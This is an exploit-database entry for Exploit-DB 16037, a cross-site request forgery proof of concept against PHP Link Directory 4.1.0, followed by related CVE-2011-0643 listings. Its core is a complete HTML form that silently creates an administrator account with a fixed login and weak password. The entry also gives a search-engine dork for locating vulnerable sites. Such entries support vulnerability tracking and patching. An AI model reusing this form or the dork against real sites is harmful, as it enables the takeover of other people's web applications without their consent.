Lucene search
AtT4CKxT3rR0r1STEDB-ID:16037HistoryJan 23, 2011 - 12:00 a.m.
PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)
2011-01-2300:00:00
AtT4CKxT3rR0r1ST
www.exploit-db.com
70
AI Score
7.4
Confidence
Low
PHP Link Directory v4.1.0 CSRF Vulnerability (Add Admin)
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://www.phplinkdirectory.com/
.:. Dork : "Powered by: PHP Link Directory"
.:. Gr34T$ T0 [h1ch4m] & [Risky] & [www.Hack-Book.com]
####################################################################
===[ Exploit ]===
<html>
<head>
<title>PHP Link Directory v4.1.0 [Add Admin]</title>
</head>
<H2>CSRF Add Admin By AtT4CKxT3rR0r1ST</H2>
<form method="POST" name="form0" action="http://localhost/admin/conf_users_edit.php?action=N">
<input type="hidden" name="LOGIN" value="webmaster"/>
<input type="hidden" name="NAME" value="Mohammad Hussien"/>
<input type="hidden" name="PASSWORD" value="123456"/>
<input type="hidden" name="PASSWORDC" value="123456"/>
<input type="hidden" name="LANGUAGE" value="sq"/>
<input type="hidden" name="EMAIL" value="[email protected]"/>
<input type="hidden" name="cemail" value="1"/>
<input type="hidden" name="LEVEL" value="1"/>
<input type="hidden" name="formSubmitted" value="1"/>
<input type="hidden" name="id" value=""/>
<input type="hidden" name="exclude_id" value=""/>
</form>
</body>
</html>
####################################################################
Related
cvelist
cvelist
CVE-2011-0643
2011-01-25 18:00:00
nvd
nvd
CVE-2011-0643
2011-01-25 19:00:06
prion
prion
Cross site request forgery (csrf)
2011-01-25 19:00:00
cve
cve
CVE-2011-0643
2011-01-25 19:00:06